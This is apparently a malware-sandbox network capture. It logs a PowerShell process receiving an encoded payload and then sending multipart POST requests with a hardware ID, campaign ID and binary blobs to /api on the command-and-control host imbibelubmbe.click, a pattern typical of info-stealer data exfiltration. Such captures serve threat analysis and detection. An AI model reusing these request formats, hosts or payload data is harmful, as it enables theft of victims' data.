{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pGt23mJ9yXzqWyyNzJ72nn46xbQaOwJF%2FWqJuAFOn9MsrBBMDAlLdsNyd1gmmHpL7lPzZJxgScDbc96iT8GvYa5uMv2Xil9Usk20r4ZpoGfa01ivVIvrWPR4D%2FoyFK3npHdoFY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b9754a27c344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1596&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=982&delivery_rate=1813664&cwnd=215&unsent_bytes=0&cid=5d5cac8e69aedd66&ts=335&x=0"
2024-12-31 07:58:26 UTC	244	IN	Data Raw: 34 65 61 30 0d 0a 44 6b 2b 54 79 46 7a 5a 30 63 45 79 37 32 67 6f 67 44 2f 79 2f 46 68 39 71 6a 63 31 4d 42 5a 32 36 65 45 38 33 55 4b 31 6d 6f 64 31 62 65 58 71 5a 75 33 39 34 30 47 4b 53 68 4c 6d 58 70 36 50 50 56 47 49 56 6c 45 53 4c 42 43 49 6a 55 2b 34 62 70 66 73 36 69 78 31 39 61 6b 77 71 72 54 74 45 49 6f 51 43 72 70 6b 69 64 34 39 45 34 67 4e 46 31 56 38 46 49 69 4e 58 72 77 70 32 75 72 72 62 53 66 2f 72 7a 53 38 73 71 56 54 67 77 56 4e 35 56 71 54 6c 6a 59 55 78 31 39 59 45 6a 70 55 6a 4a 73 65 35 32 44 34 2f 2f 4e 76 41 76 4b 37 4e 2f 75 73 37 55 6e 4e 44 55 61 69 42 64 43 64 50 52 2f 47 55 56 46 62 66 68 36 42 68 56 2b 35 4b 4d 58 7a 34 57 59 6e 38 61 77 31 74 72 75 78 58 6f 6b 43 52 75 4e 51 6b 39 35 30 58 38 Data Ascii: 4ea0Dk+TyFzZ0cEy72gogD/y/Fh9qjc1MBZ26eE83UK1mod1beXqZu3940GKShLmXp6PPVGIVlESLBCIjU+4bpfs6ix19akwqrTtEIoQCrpkid49E4gNF1V8FIiNXrwp2urrbSf/rzS8sqVTgwVN5VqTljYUx19YEjpUjJse52D4//NvAvK7N/us7UnNDUaiBdCdPR/GUVFbfh6BhV+5KMXz4WYn8aw1truxXokCRuNQk950X8
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 39 4e 46 77 6f 30 52 37 6d 41 54 36 34 31 32 75 6a 6a 4c 44 4b 2f 73 33 36 38 76 2b 4d 49 7a 51 4a 47 37 46 69 54 6b 54 30 65 79 45 64 59 55 6e 63 63 67 34 64 55 73 43 2f 59 39 75 39 72 4a 66 69 74 4d 62 79 37 70 56 2b 4f 53 67 53 69 57 6f 6a 65 59 6c 2f 6f 52 56 52 52 59 42 6d 61 77 30 48 78 4f 5a 66 2f 36 53 78 31 73 61 77 77 75 72 36 6a 51 6f 55 42 51 65 64 50 6d 35 63 33 45 73 68 59 58 56 31 33 46 49 79 4a 56 4c 41 71 30 2f 58 6f 61 69 33 78 36 6e 44 37 74 4c 73 51 31 55 70 70 35 30 32 58 6b 69 78 64 38 68 56 49 48 47 31 55 6a 49 38 65 35 32 44 66 2f 65 5a 76 4a 76 36 70 4e 72 43 68 6f 30 4b 4c 42 30 2f 77 57 35 57 51 4d 42 7a 61 58 31 6c 55 64 78 32 41 69 6c 75 34 4a 4a 65 32 70 57 73 31 73 66 4a 2b 6d 72 36 6f 58 49 63 64 53 71 4a 43 33 6f 64 36 47 Data Ascii: 9NFwo0R7mAT6412ujjLDK/s368v+MIzQJG7FiTkT0eyEdYUnccg4dUsC/Y9u9rJfitMby7pV+OSgSiWojeYl/oRVRRYBmaw0HxOZf/6Sx1sawwur6jQoUBQedPm5c3EshYXV13FIyJVLAq0/Xoai3x6nD7tLsQ1Upp502Xkixd8hVIHG1UjI8e52Df/eZvJv6pNrCho0KLB0/wW5WQMBzaX1lUdx2Ailu4JJe2pWs1sfJ+mr6oXIcdSqJC3od6G
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 55 65 78 6d 48 77 78 44 2f 4a 38 2b 34 76 53 77 48 38 72 34 39 73 66 47 57 55 34 4d 45 54 66 51 64 6a 39 41 6a 58 38 39 5a 46 77 6f 30 47 59 71 4c 57 4b 30 76 32 76 76 72 59 69 4c 30 70 54 61 37 73 36 35 56 69 51 46 42 34 56 43 55 6a 44 41 66 77 46 42 57 57 48 35 55 78 63 4e 5a 70 32 43 50 75 4e 52 37 4a 72 4f 66 50 62 57 39 70 45 62 4e 46 51 54 37 48 5a 65 53 65 6b 65 49 57 46 39 58 63 52 75 4b 69 56 43 36 4b 74 76 77 36 32 38 2f 2f 71 34 2b 74 37 75 70 58 59 4d 4f 51 75 74 57 6d 35 67 36 48 73 49 56 47 52 4a 7a 44 4d 76 62 48 6f 73 6e 32 2f 58 71 4c 68 6a 79 70 44 43 38 70 65 4e 50 77 78 4d 4b 35 56 48 51 78 6e 6f 54 77 56 56 63 57 48 41 55 6a 49 35 62 76 43 66 55 39 65 4a 6d 49 2f 61 75 4d 72 4b 2b 70 56 43 4b 44 6b 2f 77 57 4a 6d 53 4e 6c 2b 47 46 56 Data Ascii: UexmHwxD/J8+4vSwH8r49sfGWU4METfQdj9AjX89ZFwo0GYqLWK0v2vvrYiL0pTa7s65ViQFB4VCUjDAfwFBWWH5UxcNZp2CPuNR7JrOfPbW9pEbNFQT7HZeSekeIWF9XcRuKiVC6Ktvw628//q4+t7upXYMOQutWm5g6HsIVGRJzDMvbHosn2/XqLhjypDC8peNPwxMK5VHQxnoTwVVcWHAUjI5bvCfU9eJmI/auMrK+pVCKDk/wWJmSNl+GFV
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 6b 73 4e 5a 73 32 43 50 75 4f 78 6c 50 2f 2b 6b 4e 37 61 31 71 31 65 44 42 30 48 6b 56 70 65 5a 50 42 4c 41 57 46 4a 52 64 52 43 42 6b 56 32 30 4b 74 72 79 70 53 4a 74 39 72 4a 2b 34 2f 4f 45 58 4b 51 61 55 66 42 4c 30 49 46 30 42 6f 68 53 57 78 49 73 56 49 69 4d 56 37 41 6f 33 2f 66 71 61 43 50 33 72 44 4f 2b 76 4b 6c 43 68 51 52 48 36 56 4b 62 6a 44 6f 53 7a 46 6c 54 57 6e 38 65 79 38 30 65 75 44 69 58 6f 4b 56 5a 49 50 36 71 50 61 33 7a 76 42 36 55 53 6b 33 75 48 63 6a 65 4e 68 48 49 57 6c 74 65 66 78 79 4b 6a 31 43 34 4a 64 37 77 37 58 34 73 39 61 49 2f 74 62 79 69 56 49 67 50 54 75 56 5a 6c 70 46 36 55 59 68 53 54 78 49 73 56 4b 53 6b 61 2f 30 42 37 62 6a 36 49 6a 53 78 72 54 4c 37 36 2b 4e 63 6a 67 5a 43 37 56 75 5a 6b 6a 41 57 77 31 6c 63 56 6e 67 Data Ascii: ksNZs2CPuOxlP/+kN7a1q1eDB0HkVpeZPBLAWFJRdRCBkV20KtrypSJt9rJ+4/OEXKQaUfBL0IF0BohSWxIsVIiMV7Ao3/fqaCP3rDO+vKlChQRH6VKbjDoSzFlTWn8ey80euDiXoKVZIP6qPa3zvB6USk3uHcjeNhHIWltefxyKj1C4Jd7w7X4s9aI/tbyiVIgPTuVZlpF6UYhSTxIsVKSka/0B7bj6IjSxrTL76+NcjgZC7VuZkjAWw1lcVng
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 62 34 68 30 65 72 69 5a 54 2f 2f 70 7a 47 7a 75 36 70 52 69 51 39 48 35 46 47 61 6e 7a 30 52 78 6c 30 58 48 44 51 54 6b 38 4d 47 2f 77 48 48 34 2f 64 36 49 4e 43 6e 4d 66 75 73 37 55 6e 4e 44 55 61 69 42 64 43 58 4b 42 76 46 52 31 35 56 65 68 75 49 6b 56 2b 79 4b 38 58 2f 36 6d 67 71 2f 61 77 78 76 62 4b 6d 57 6f 45 4e 54 2b 6c 53 6e 4e 35 30 58 38 39 4e 46 77 6f 30 4f 6f 43 51 53 62 77 75 33 4f 37 2b 4c 44 4b 2f 73 33 36 38 76 2b 4d 49 7a 51 6c 42 36 56 6d 51 6b 6a 6f 62 78 56 56 46 58 58 4d 54 67 6f 68 4d 74 53 66 51 38 2b 31 6e 49 76 65 34 4d 72 57 68 70 6b 4b 66 53 67 53 69 57 6f 6a 65 59 6c 2f 2b 55 6b 64 43 64 31 61 36 6c 56 32 70 4b 39 72 30 70 58 4e 6a 36 4f 6f 35 74 2f 50 37 45 49 73 46 51 2b 46 53 6b 5a 63 32 45 73 31 63 55 6c 4e 79 45 49 47 4a Data Ascii: b4h0eriZT//pzGzu6pRiQ9H5FGanz0Rxl0XHDQTk8MG/wHH4/d6INCnMfus7UnNDUaiBdCXKBvFR15VehuIkV+yK8X/6mgq/awxvbKmWoENT+lSnN50X89NFwo0OoCQSbwu3O7+LDK/s368v+MIzQlB6VmQkjobxVVFXXMTgohMtSfQ8+1nIve4MrWhpkKfSgSiWojeYl/+UkdCd1a6lV2pK9r0pXNj6Oo5t/P7EIsFQ+FSkZc2Es1cUlNyEIGJ
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 66 6e 71 33 56 74 39 71 5a 2b 34 2f 4f 67 56 34 34 4c 51 4f 74 52 6e 35 6b 2b 44 63 4a 53 52 56 4e 31 48 34 61 50 58 72 49 74 33 66 6e 73 59 53 48 38 72 54 6d 30 74 75 4d 65 7a 51 31 53 6f 67 58 51 76 7a 63 55 78 41 34 4e 45 6d 74 61 6b 73 4e 5a 73 32 43 50 75 4f 56 6d 4b 50 75 6e 50 62 53 77 73 56 47 4c 47 45 72 76 56 34 4b 55 4d 52 72 46 57 46 70 52 63 68 4b 41 6a 30 79 32 49 4e 54 7a 70 53 4a 74 39 72 4a 2b 34 2f 4f 41 52 35 73 41 54 65 35 4c 6d 35 38 35 43 63 56 46 46 78 77 30 42 59 79 53 48 75 63 32 78 2b 2f 69 63 32 50 6f 36 6a 6d 33 38 2f 73 51 69 77 4e 4d 35 56 75 65 6a 44 38 5a 78 31 70 65 57 33 41 63 69 49 4e 61 75 79 66 53 2b 2b 6c 6e 4b 76 4b 6c 4f 72 4b 39 71 6c 2f 4e 52 41 72 6c 52 64 44 47 65 6a 37 54 56 6c 74 66 4e 41 76 46 6d 68 36 34 4c Data Ascii: fnq3Vt9qZ+4/OgV44LQOtRn5k+DcJSRVN1H4aPXrIt3fnsYSH8rTm0tuMezQ1SogXQvzcUxA4NEmtaksNZs2CPuOVmKPunPbSwsVGLGErvV4KUMRrFWFpRchKAj0y2INTzpSJt9rJ+4/OAR5sATe5Lm585CcVFFxw0BYySHuc2x+/ic2Po6jm38/sQiwNM5VuejD8Zx1peW3AciINauyfS++lnKvKlOrK9ql/NRArlRdDGej7TVltfNAvFmh64L
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 73 64 62 47 4b 4e 61 32 32 70 45 62 50 50 30 6e 73 55 35 65 49 65 67 44 33 47 78 64 54 4e 45 79 79 6d 68 36 70 59 49 2b 71 71 79 77 2f 73 66 4a 2b 2f 4c 43 78 51 6f 73 4a 58 4f 45 61 72 71 41 64 43 63 4a 53 52 31 56 6a 47 38 76 4e 48 72 42 67 6a 38 47 6c 5a 53 72 71 75 79 69 32 6f 36 51 51 73 6b 51 4b 2b 68 33 49 33 67 38 63 78 6c 74 51 52 47 56 5a 72 4a 56 55 75 44 44 51 37 2b 6f 73 59 37 47 73 66 75 50 67 37 52 43 4a 47 77 71 36 44 63 4c 46 62 30 79 66 42 51 56 4e 4f 67 33 4c 6c 52 37 6e 63 70 6d 34 39 79 78 31 73 65 30 39 71 61 47 6c 55 35 73 4a 44 64 78 6a 74 34 51 33 47 64 39 45 61 57 78 7a 44 6f 61 46 53 61 35 73 77 76 76 72 59 69 72 6e 36 6e 44 37 76 4f 4d 49 74 45 6f 43 6f 6d 4c 65 33 69 4a 66 6b 42 56 69 55 58 6f 61 6a 4a 56 50 38 67 66 4e 39 65 Data Ascii: sdbGKNa22pEbPP0nsU5eIegD3GxdTNEyymh6pYI+qqyw/sfJ+/LCxQosJXOEarqAdCcJSR1VjG8vNHrBgj8GlZSrquyi2o6QQskQK+h3I3g8cxltQRGVZrJVUuDDQ7+osY7GsfuPg7RCJGwq6DcLFb0yfBQVNOg3LlR7ncpm49yx1se09qaGlU5sJDdxjt4Q3Gd9EaWxzDoaFSa5swvvrYirn6nD7vOMItEoComLe3iJfkBViUXoajJVP8gfN9e
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 36 6d 62 37 39 4b 42 43 6e 77 78 4a 39 46 37 58 6f 41 51 34 78 6c 4a 57 52 47 51 44 68 4c 31 67 71 69 50 5a 39 75 4a 36 50 4c 48 6b 66 72 54 7a 2b 32 6e 4e 51 67 72 64 45 39 43 47 65 6b 65 49 59 46 52 63 65 68 4f 64 6b 68 4f 59 4c 74 44 35 38 33 77 36 2f 75 70 77 2b 37 58 6a 43 4e 39 45 43 75 5a 4d 30 4d 5a 71 54 5a 4d 41 42 41 55 6b 52 70 54 4e 52 2f 38 32 6c 36 43 33 49 6d 33 6a 36 6d 62 37 39 4b 42 43 6e 77 78 4a 39 46 37 58 6f 41 51 34 78 6c 4a 57 52 47 51 44 68 4d 78 77 69 51 48 70 78 76 42 76 49 2f 2b 74 4b 4b 72 7a 37 52 43 43 53 68 4c 62 48 64 6a 65 42 56 47 49 54 52 63 4b 4e 43 47 49 6a 56 43 34 4e 73 61 31 77 6d 49 71 38 4c 77 75 72 4c 7a 73 66 72 73 72 43 71 77 64 6c 74 35 69 54 59 59 56 55 30 4d 30 54 4e 76 52 42 65 70 7a 67 4b 69 33 63 32 50 Data Ascii: 6mb79KBCnwxJ9F7XoAQ4xlJWRGQDhL1gqiPZ9uJ6PLHkfrTz+2nNQgrdE9CGekeIYFRcehOdkhOYLtD583w6/upw+7XjCN9ECuZM0MZqTZMABAUkRpTNR/82l6C3Im3j6mb79KBCnwxJ9F7XoAQ4xlJWRGQDhMxwiQHpxvBvI/+tKKrz7RCCShLbHdjeBVGITRcKNCGIjVC4Nsa1wmIq8LwurLzsfrsrCqwdlt5iTYYVU0M0TNvRBepzgKi3c2P
2024-12-31 07:58:26 UTC	1369	IN	Data Raw: 2b 76 6a 66 5a 38 4e 57 75 45 64 33 74 34 32 58 35 41 56 57 6b 42 7a 42 49 6a 50 57 61 55 6e 6c 2b 65 72 64 57 33 6e 36 6d 62 6f 2f 65 4e 43 7a 56 49 4b 70 56 4f 64 6e 7a 6b 52 79 30 64 46 56 48 63 43 69 4d 52 67 67 51 33 46 2f 2f 56 76 62 38 43 6e 4f 71 32 6d 6f 45 43 4b 4e 48 54 50 54 35 65 4f 4f 56 33 6b 55 6c 70 65 53 69 71 38 6b 6c 6d 76 59 76 48 37 38 32 39 74 76 2b 6f 6d 2b 2b 76 6a 66 5a 38 4e 57 75 45 66 76 4a 6b 33 45 34 68 4b 47 55 73 30 41 73 76 62 44 66 46 67 78 62 69 39 4c 47 72 79 75 43 79 39 73 4c 56 54 79 6a 52 30 7a 30 2b 58 6a 6a 6c 64 2b 56 68 54 52 47 45 58 6d 34 52 67 67 51 33 46 2f 2f 56 76 62 39 53 51 66 49 71 6c 6f 46 43 44 44 51 71 73 48 59 6a 65 59 6c 2f 6c 52 31 42 43 64 31 61 75 75 52 79 4f 4e 74 54 34 36 32 74 74 76 2b 6f 79 Data Ascii: +vjfZ8NWuEd3t42X5AVWkBzBIjPWaUnl+erdW3n6mbo/eNCzVIKpVOdnzkRy0dFVHcCiMRggQ3F//Vvb8CnOq2moECKNHTPT5eOOV3kUlpeSiq8klmvYvH7829tv+om++vjfZ8NWuEfvJk3E4hKGUs0AsvbDfFgxbi9LGryuCy9sLVTyjR0z0+Xjjld+VhTRGEXm4RggQ3F//Vvb9SQfIqloFCDDQqsHYjeYl/lR1BCd1auuRyONtT462ttv+oy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49904	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:27 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q74O17O4JHA9CJ6NO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: imbibelubmbe.click
2024-12-31 07:58:27 UTC	15331	OUT	Data Raw: 2d 2d 51 37 34 4f 31 37 4f 34 4a 48 41 39 43 4a 36 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 51 37 34 4f 31 37 4f 34 4a 48 41 39 43 4a 36 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 37 34 4f 31 37 4f 34 4a 48 41 39 43 4a 36 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a Data Ascii: --Q74O17O4JHA9CJ6NOContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--Q74O17O4JHA9CJ6NOContent-Disposition: form-data; name="pid"2--Q74O17O4JHA9CJ6NOContent-Disposition: form-data; name="lid"jMw1IE--SHELLS
2024-12-31 07:58:27 UTC	2827	OUT	Data Raw: 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
2024-12-31 07:58:27 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9cfbrdot34gr9hauml1rg8ks68; expires=Sat, 26 Apr 2025 01:45:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Jk55AHcUIx5Xcg6yhcazwVWlbnW3%2FVodBWlNihcpB4pj7gjBQHbFFAg6jTi0hAI4RSR0bWvX1RgchKFa3jvZ6hVnCV6vHZGOs2JHsEGLujWgOGhTT99Z3a51fV0qUG8%2Fksq36c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b97b98608ccd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2009&rtt_var=768&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19121&delivery_rate=1412675&cwnd=195&unsent_bytes=0&cid=e90267b8eb5871ea&ts=701&x=0"
2024-12-31 07:58:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:58:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49913	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:28 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PNATZCY1T357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8749 Host: imbibelubmbe.click
2024-12-31 07:58:28 UTC	8749	OUT	Data Raw: 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 50 4e 41 54 5a 43 59 31 54 33 35 37 0d Data Ascii: --PNATZCY1T357Content-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--PNATZCY1T357Content-Disposition: form-data; name="pid"2--PNATZCY1T357Content-Disposition: form-data; name="lid"jMw1IE--SHELLS--PNATZCY1T357
2024-12-31 07:58:28 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4voqta7p24hlo94q1ladf5690s; expires=Sat, 26 Apr 2025 01:45:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c34CryI%2B1iqKIX7kdZg6vGli6S10BxaIkIWGHf19OUGV5eLvovL%2BFprVgQs%2BWpbub4%2BCMp6aS4V2frye29CSIFu9VQgug5wVA80Chsn8YqpJ%2B8blrf08E4dDvDYEjZP3qN0o74Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b9836ff643aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=611&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9684&delivery_rate=1771844&cwnd=241&unsent_bytes=0&cid=49e756653f93a45c&ts=582&x=0"
2024-12-31 07:58:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:58:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49919	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:29 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UHJAPGRGYDDYH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20408 Host: imbibelubmbe.click
2024-12-31 07:58:29 UTC	15331	OUT	Data Raw: 2d 2d 55 48 4a 41 50 47 52 47 59 44 44 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 34 46 42 46 37 46 37 36 44 46 34 30 43 42 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 55 48 4a 41 50 47 52 47 59 44 44 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 48 4a 41 50 47 52 47 59 44 44 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 55 48 4a 41 50 47 52 47 59 44 Data Ascii: --UHJAPGRGYDDYHContent-Disposition: form-data; name="hwid"424FBF7F76DF40CB92A467F615F074C7--UHJAPGRGYDDYHContent-Disposition: form-data; name="pid"3--UHJAPGRGYDDYHContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--UHJAPGRGYD
2024-12-31 07:58:29 UTC	5077	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-31 07:58:30 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3rkfcdcu7l7dc6krpbg1ldmb3h; expires=Sat, 26 Apr 2025 01:45:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAbRvUQkrmOGcqdQFHINZAw9u5NF0E9zm5NettcyF%2Fsea0UGxxKAC8Ihds07rZHoDoqmxJHTB18Gfh62rKy1LlLhWj0532lOGKB8tP6pmoYO7yvvArNzDjR7nDXmplvg5Ncc4Qo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b98b2ac08ca5-EWR alt-svc: h3=":443"; ma=86400 